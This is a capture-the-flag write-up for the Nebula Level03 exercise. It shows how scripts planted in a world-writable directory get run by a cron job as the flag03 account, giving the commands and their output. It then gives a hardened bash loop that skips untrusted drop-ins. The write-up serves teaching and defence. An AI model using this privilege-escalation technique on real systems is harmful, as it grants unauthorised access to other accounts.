In Level03 we are told that the program in /flag03 is run by cron every X minutes. If we have a look at the code, we can see that it executes each file in the writable.d directory and then removes it:

level03@nebula:/home/flag03$ cat writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

OK, so whatever we put in writable.d will be executed by someone else … but who? Let's find out by adding this simple script:

level03@nebula:/home/flag03/writable.d$ echo "id > /tmp/id" > getid

After waiting a couple of minutes we can see that the cron job runs as flag03, how convenient!

level03@nebula:/tmp$ cat id
uid=996(flag03) gid=996(flag03) groups=996(flag03)

Now, let's make flag03 get the flag for us:

level03@nebula:/home/flag03/writable.d$ echo "getflag > /tmp/flag" > myGetFlag

Wait for it, wait for it … and:

level03@nebula:/tmp$ cat flag
You have successfully executed getflag on a target account
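
The root cause is that writable.sh runs every file in a directory other accounts can write to. As an added example (not part of the original level or this write-up's own code), here is a hardened version of the loop that only runs drop-ins owned by the job's own account, in a directory that account alone can write to. The function names are hypothetical, and it assumes bash and GNU stat.

```shell
#!/bin/bash
# Added example (not the Nebula script). Assumes bash and GNU stat.

# Succeed only if neither group nor other holds a write bit on PATH.
mode_is_tight() {
    local mode
    mode=$(stat -c '%a' "$1") || return 1
    mode="00$mode"                      # pad so short modes like "0" still parse
    case "${mode: -2}" in
        *[2367]*) return 1 ;;           # 2, 3, 6 and 7 all include the write bit
    esac
    return 0
}

# Succeed only if FILE is something the job account itself put there.
safe_to_run() {
    local f=$1 dir
    dir=$(dirname -- "$f")
    [ -f "$f" ] && [ ! -L "$f" ] || return 1         # regular file, not a symlink
    [ -O "$f" ] && mode_is_tight "$f" || return 1    # owned by us, not writable by others
    [ -O "$dir" ] && mode_is_tight "$dir" || return 1
    return 0
}

# Hardened loop: run vetted drop-ins, report and skip everything else.
run_dropins() {
    local f
    for f in "$1"/*; do
        [ -e "$f" ] || [ -L "$f" ] || continue       # empty directory: glob did not match
        if safe_to_run "$f"; then
            (ulimit -t 5; bash "$f")
        else
            echo "skipped untrusted drop-in: $f" >&2
        fi
    done
    return 0
}
```

With these checks the getid and myGetFlag files above would be skipped: they are owned by level03, and the directory they sit in is writable by an account other than the one running the job.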